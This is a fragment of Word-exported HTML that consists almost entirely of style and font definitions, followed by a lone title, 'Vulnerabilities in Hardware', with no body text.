<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Contemporary"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Elegant"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Professional"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Balloon Text"/>
<w:LsdException Locked="false" Priority="39" Name="Table Grid"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Theme"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Level 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Level 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Level 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Level 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Level 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Level 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Level 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Level 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Level 9"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" QFormat="true"
Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" QFormat="true"
Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" QFormat="true"
Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" QFormat="true"
Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" QFormat="true"
Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" QFormat="true"
Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" SemiHidden="true"
UnhideWhenUsed="true" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="TOC Heading"/>
<w:LsdException Locked="false" Priority="41" Name="Plain Table 1"/>
<w:LsdException Locked="false" Priority="42" Name="Plain Table 2"/>
<w:LsdException Locked="false" Priority="43" Name="Plain Table 3"/>
<w:LsdException Locked="false" Priority="44" Name="Plain Table 4"/>
<w:LsdException Locked="false" Priority="45" Name="Plain Table 5"/>
<w:LsdException Locked="false" Priority="40" Name="Grid Table Light"/>
<w:LsdException Locked="false" Priority="46" Name="Grid Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="Grid Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="Grid Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="46" Name="List Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="List Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="List Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Mention"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Smart Hyperlink"/>
</w:LatentStyles>
</xml><![endif]-->
<style>
<!--
/* Font Definitions */
@font-face
{font-family:"Courier New";
panose-1:2 7 3 9 2 2 5 2 4 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:-536859905 -1073711037 9 0 511 0;}
@font-face
{font-family:Wingdings;
panose-1:5 0 0 0 0 0 0 0 0 0;
mso-font-charset:2;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:0 268435456 0 0 -2147483648 0;}
@font-face
{font-family:"Cambria Math";
panose-1:2 4 5 3 5 4 6 3 2 4;
mso-font-charset:1;
mso-generic-font-family:roman;
mso-font-format:other;
mso-font-pitch:variable;
mso-font-signature:0 0 0 0 0 0;}
@font-face
{font-family:Calibri;
panose-1:2 15 5 2 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:-536870145 1073786111 1 0 415 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{mso-style-unhide:no;
mso-style-qformat:yes;
mso-style-parent:"";
margin:0cm;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Calibri;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:Calibri;
mso-fareast-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;
mso-fareast-language:EN-US;}
p.MsoListParagraph, li.MsoListParagraph, div.MsoListParagraph
{mso-style-priority:34;
mso-style-unhide:no;
mso-style-qformat:yes;
margin-top:0cm;
margin-right:0cm;
margin-bottom:0cm;
margin-left:36.0pt;
margin-bottom:.0001pt;
mso-add-space:auto;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Calibri;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:Calibri;
mso-fareast-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;
mso-fareast-language:EN-US;}
p.MsoListParagraphCxSpFirst, li.MsoListParagraphCxSpFirst, div.MsoListParagraphCxSpFirst
{mso-style-priority:34;
mso-style-unhide:no;
mso-style-qformat:yes;
mso-style-type:export-only;
margin-top:0cm;
margin-right:0cm;
margin-bottom:0cm;
margin-left:36.0pt;
margin-bottom:.0001pt;
mso-add-space:auto;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Calibri;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:Calibri;
mso-fareast-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;
mso-fareast-language:EN-US;}
p.MsoListParagraphCxSpMiddle, li.MsoListParagraphCxSpMiddle, div.MsoListParagraphCxSpMiddle
{mso-style-priority:34;
mso-style-unhide:no;
mso-style-qformat:yes;
mso-style-type:export-only;
margin-top:0cm;
margin-right:0cm;
margin-bottom:0cm;
margin-left:36.0pt;
margin-bottom:.0001pt;
mso-add-space:auto;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Calibri;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:Calibri;
mso-fareast-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;
mso-fareast-language:EN-US;}
p.MsoListParagraphCxSpLast, li.MsoListParagraphCxSpLast, div.MsoListParagraphCxSpLast
{mso-style-priority:34;
mso-style-unhide:no;
mso-style-qformat:yes;
mso-style-type:export-only;
margin-top:0cm;
margin-right:0cm;
margin-bottom:0cm;
margin-left:36.0pt;
margin-bottom:.0001pt;
mso-add-space:auto;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Calibri;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:Calibri;
mso-fareast-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;
mso-fareast-language:EN-US;}
.MsoChpDefault
{mso-style-type:export-only;
mso-default-props:yes;
font-family:Calibri;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:Calibri;
mso-fareast-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;
mso-fareast-language:EN-US;}
@page WordSection1
{size:595.0pt 842.0pt;
margin:72.0pt 72.0pt 72.0pt 72.0pt;
mso-header-margin:35.4pt;
mso-footer-margin:35.4pt;
mso-paper-source:0;}
div.WordSection1
{page:WordSection1;}
/* List Definitions */
@list l0
{mso-list-id:638611595;
mso-list-type:hybrid;
mso-list-template-ids:-517450438 275392172 134807555 134807557 134807553 134807555 134807557 134807553 134807555 134807557;}
@list l0:level1
{mso-level-start-at:0;
mso-level-number-format:bullet;
mso-level-text:-;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:90.0pt;
text-indent:-18.0pt;
font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-fareast-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;}
@list l0:level2
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:126.0pt;
text-indent:-18.0pt;
font-family:"Courier New";}
@list l0:level3
{mso-level-number-format:bullet;
mso-level-text:;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:162.0pt;
text-indent:-18.0pt;
font-family:Wingdings;}
@list l0:level4
{mso-level-number-format:bullet;
mso-level-text:;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:198.0pt;
text-indent:-18.0pt;
font-family:Symbol;}
@list l0:level5
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:234.0pt;
text-indent:-18.0pt;
font-family:"Courier New";}
@list l0:level6
{mso-level-number-format:bullet;
mso-level-text:;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:270.0pt;
text-indent:-18.0pt;
font-family:Wingdings;}
@list l0:level7
{mso-level-number-format:bullet;
mso-level-text:;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:306.0pt;
text-indent:-18.0pt;
font-family:Symbol;}
@list l0:level8
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:342.0pt;
text-indent:-18.0pt;
font-family:"Courier New";}
@list l0:level9
{mso-level-number-format:bullet;
mso-level-text:;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:378.0pt;
text-indent:-18.0pt;
font-family:Wingdings;}
ol
{margin-bottom:0cm;}
ul
{margin-bottom:0cm;}
</style>
<br />
-->
<!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin:0cm;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Calibri;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-fareast-language:EN-US;}
</style>
<![endif]-->
<!--StartFragment-->
<!--EndFragment--><div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">Vulnerabilities
in Hardware<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;"><br /></span></div>
